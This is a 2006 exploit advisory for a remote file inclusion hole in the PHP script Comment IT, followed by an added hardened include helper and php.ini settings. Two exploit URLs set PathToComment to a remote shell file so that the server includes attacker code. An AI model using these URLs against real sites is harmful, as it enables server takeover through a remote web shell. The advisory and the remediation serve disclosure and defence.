Comment IT (class_admin.php , class_comments.php) Remote File Include Vulnerability

Found By : CoLd Zero [ Wasem898 ]
Palestine Muslim Hacker's

######################################################
#
# [ Comment IT ]
#
# Class: File Include Vulnerability
# Published 2006-10-24
# Remote: Yes
# Critical Level : Dangerous
# Site: http://www.comscripts.com/scripts/php.comment-it.623.html
# Author: Cold Zero
# Contact: ip.123.456.78.90@hotmail.com
#
######################################################

Files:

class_admin.php
class_comments.php

======================================================

Vuln Code

include_once ($PathToComment."/classes/class_db.php");

=======================================================

Exploit :

Http:// www.Victem.0 / [Comment IT_path] /classes/class_admin.php?PathToComment=http://ColdZero-Shell.txt

Http:// www.Victem.0 / [Comment IT_path] /classes/class_comments.php?PathToComment=http://ColdZero-Shell.txt

----
Thanx: [MoHaNdKo] [Cold ThreE] [Viper Hacker] [The Wolf KSA] ]organza[
----
GreeTz: All www.4azhar.Com Members

Cont : ip.123.456.78.90@hotmail.com

--------------------------------------|| Viva Palestine ||-----------------------------------------

# milw0rm.com [2006-10-25]
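
Hardened form of the include quoted under "Vuln Code", as an added example that is not part of the original advisory and not Comment IT's own code. The helper name comment_it_class_file and the allowlist are hypothetical. The example assumes $PathToComment is reachable from the request through register_globals, which the advisory does not state.

```php
<?php
// Added example, not Comment IT's code. Vulnerable form quoted in the advisory:
//   include_once ($PathToComment."/classes/class_db.php");
// Nothing in the class file sets $PathToComment, so a direct request can
// supply it (assumption: register_globals is enabled on the server).

// Hypothetical helper: resolve a class file against a base directory that is
// fixed by the code's own location, never by a request-controlled variable.
function comment_it_class_file(string $baseDir, string $name): string
{
    // Allowlist of the class files named in the advisory.
    $allowed = ['class_db.php', 'class_admin.php', 'class_comments.php'];
    if (!in_array($name, $allowed, true)) {
        throw new InvalidArgumentException("class file not allowed: $name");
    }
    // realpath() only resolves local paths: it returns false for URLs and
    // for files that do not exist.
    $base = realpath($baseDir);
    $path = ($base === false) ? false : realpath($base . '/classes/' . $name);
    // The prefix check rejects results that leave <base>/classes/ via
    // symlinks or ".." segments.
    $prefix = $base . DIRECTORY_SEPARATOR . 'classes' . DIRECTORY_SEPARATOR;
    if ($path === false || strpos($path, $prefix) !== 0) {
        throw new RuntimeException('class file outside application directory');
    }
    return $path;
}

// Replacement line for classes/class_admin.php and classes/class_comments.php:
//   include_once comment_it_class_file(dirname(__DIR__), 'class_db.php');

// Constructed demo (CLI only): build a throwaway tree and exercise the helper.
if (PHP_SAPI === 'cli' && isset($argv[0]) && realpath($argv[0]) === __FILE__) {
    $root = sys_get_temp_dir() . '/commentit_demo_' . getmypid();
    mkdir($root . '/classes', 0700, true);
    file_put_contents($root . '/classes/class_db.php', "<?php // stub\n");
    echo comment_it_class_file($root, 'class_db.php'), "\n"; // local file resolves
    foreach (['http://example.invalid/x', '/etc'] as $bad) { // constructed bad bases
        try {
            comment_it_class_file($bad, 'class_db.php');
        } catch (RuntimeException $e) {
            echo "rejected base: $bad\n";
        }
    }
    unlink($root . '/classes/class_db.php');
    rmdir($root . '/classes');
    rmdir($root);
}
```

Independently of the code change, allow_url_include = Off in php.ini blocks the remote-URL form of the include, and register_globals = Off stops query parameters from becoming script variables.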